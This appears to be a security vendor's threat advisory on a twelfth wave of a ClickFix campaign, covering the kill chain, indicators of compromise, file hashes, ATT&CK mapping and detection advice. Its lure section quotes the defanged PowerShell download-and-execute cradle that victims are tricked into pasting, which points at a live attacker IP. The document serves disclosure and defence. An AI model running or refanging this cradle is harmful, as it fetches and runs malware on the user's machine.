SL-ADV-2026-WP-001 · Version 12
Unknown APT (AS202412) — ClickFix → BSC EtherHiding → DonutLoader
V12 wave · unattributed actor on AS202412 infra · lure ejecutivos.es · C2 senterprise2026.com
SEVERITY: HIGH
TLP:CLEAR
Actor: UNKNOWN APT · AS202412 infra
Continuity: infra-confirmed (same unattributed actor)
Published 2026-07-07 · Dispensight / SecureLeaf
Executive summary
A twelfth iteration of this ClickFix cluster is live. The threat actor remains unattributed — we track it as an unknown APT using AS202412 infrastructure. ("Omegatech LTD" is the registered operator of AS202412, a Seychelles bulletproof-hosting AS — the infrastructure provider, not a confirmed actor identity.) Continuity with prior waves — i.e. the same unattributed actor — is confirmed by infrastructure reuse: the detonation contacts three IPs already in the
SecureLeaf Omegatech corpus (158.94.208.104, 178.16.53.137, 91.92.240.121),
retains BSC-testnet EtherHiding, and preserves the obfuscator.io RC4/rotate loader family, the
/?sid= TDS pattern, student_*.bin payload naming (V9 lineage) and the .NET
DonutLoader stage (V11). V12 introduces a new C2 domain acting as a verification / anti-replay
node, a new stage-2 path, and fully-encoded network strings that defeat signatures gated on
cleartext eth_call.
Kill chain (V12)
Compromised lure. Victim loads ejecutivos.es (WordPress/Avada — Revista Ejecutivos). An obfuscator.io loader is injected as 1 of 32 script blocks.
TDS. Loader beacons to dntds.shop; SID-tracked request /?sid=<epochms>-<rand>.
EtherHiding retained. Reads staging data from bsc-testnet-rpc.publicnode.com via eth_call (now fully encoded in the string-array).
ClickFix. Fake Cloudflare challenge tricks the user into pasting a PowerShell one-liner (below).
Verification node NEW. senterprise2026.com checks whether the SID already executed (confirmChallenge anti-replay).
Stage-2 evolved. /s_enterprise/ on 158.94.208.104 (was /my_enterprise/).
Payload. /x7GkP2mQ9zL4/student_s.bin — Donut shellcode (E8 GetPC, 53,323 B) + .NET loader (mscoree) compiled 2026-07-07.
ClickFix lure (defanged)
Clipboard payload the victim is social-engineered into pasting. The fake
challengeHash is the SHA-256 of the empty string — a decoy to look legitimate.
<#Verification ID:9x0j8j268evkzp39 #>
$global:cfChallenge = "challenge.cloudflare.com";
$global:challengeHash = "e3b0c442...b855"; # SHA-256("") decoy
$global:confirmChallenge = $true;
iex(irm hxxp://91[.]92[.]240[.]121/?sid=1783399818567-p3cptuik -UseBasicParsing)
<#Verification ID:9x0j8j268evkzp39 #>
Continuity vs evolution
| Trait | Status in V12 |
Infra 158.94.208.104 / 178.16.53.137 / 91.92.240.121 | REUSED (same-actor proof) |
BSC-testnet EtherHiding (bsc-testnet-rpc.publicnode.com) | Retained (V11) |
| obfuscator.io string-array + rotate + RC4(0x100) + fromCharCode | Retained (V7–V11) |
/?sid= TDS pattern · student_*.bin naming | Retained (V11 · V9) |
.NET / mscoree DonutLoader stage | Retained (V11) |
| Compromised-legit lure delivery | Retained (splitcam → ejecutivos.es) |
| C2 domain | NEW — senterprise2026.com (was digitalenterprise2026.com) |
| Verification / anti-replay node | NEW — SID confirmChallenge tracking |
| Stage-2 path | EVOLVED — /s_enterprise/ (was /my_enterprise/) |
eth_call / network strings | EVOLVED — fully encoded (defeats cleartext sigs) |
| Donut header | EVOLVED — plain E8 GetPC stub (no MZER polyglot header) |
Indicators of compromise
Domains
| Indicator | Role |
| senterprise2026.com | C2 / verification node (NEW) |
| ejecutivos.es | Compromised WordPress lure — verify before action |
| dntds.shop | TDS / JS loader host |
| bsc-testnet-rpc.publicnode.com | EtherHiding read — shared-legit, DO-NOT-BLOCKLIST |
IPv4
| Indicator | Role | Prior |
| 158.94.208.104 | Stage-2 /s_enterprise/ + payload | V11 |
| 178.16.53.137 | Payload host | prior |
| 91.92.240.121 | ClickFix cradle (?sid=) · AS202412 | prior |
URIs / paths
| Pattern |
| /?sid=<epochms>-<rand> |
| /s_enterprise/ · /s_enterprise |
| /<random>/student_s.bin |
File hashes (SHA-256)
| Artifact | SHA-256 |
| ejecutivos.es lure page | 954f9a7eda73674e96b63f768d2ac4cef3c32ece6eb02d030bef21a0b3481472 |
| dntds.shop JS loader | e88fbd4c3a4828256ae5f8508a3ec14337f808473aef08c43152810d68b5cc01 |
| student_s.bin (Donut, 53,323 B) | e1781032bf872f74afc534f01a7f490249d84521d0fe02773035716572b367db |
| .NET PE loader (284,160 B) | 67e88d988df4e94f62935f539ed257515773507592ad32642f1500350463882a |
.NET loader imphash: edc8ef44e1870aad7a3e58dab17f8e1b · compiled 2026-07-07T00:48:10Z · unsigned
MITRE ATT&CK
T1189 Drive-by · T1584.004 Compromise Server · T1204.004 Malicious Copy-Paste (ClickFix) ·
T1059.001 PowerShell · T1102 Web Service (EtherHiding) · T1140 Deobfuscate ·
T1027.004 Compile After Delivery · T1105 Ingress Tool Transfer · T1055 Process Injection · T1071.001 Web C2
Detection & response
YARA: omegatech_v12.yar — 6 rules incl. a re-tuned obfuscator rule that
no longer depends on cleartext eth_call (closes the V12 detection gap), a ClickFix-lure rule, network,
known-hash and .NET-loader rules. STIX 2.1: SL-ADV-2026-WP-001-V12.stix.json.
Response: report ejecutivos.es compromise to its host / registrar;
submit senterprise2026.com + reused IPs to AbuseIPDB / OTX; hunt endpoints for the ClickFix
PowerShell cradle and mscoree-loaded child of powershell.exe. The BSC RPC endpoint
is shared-legit — detect behaviourally, do not blocklist.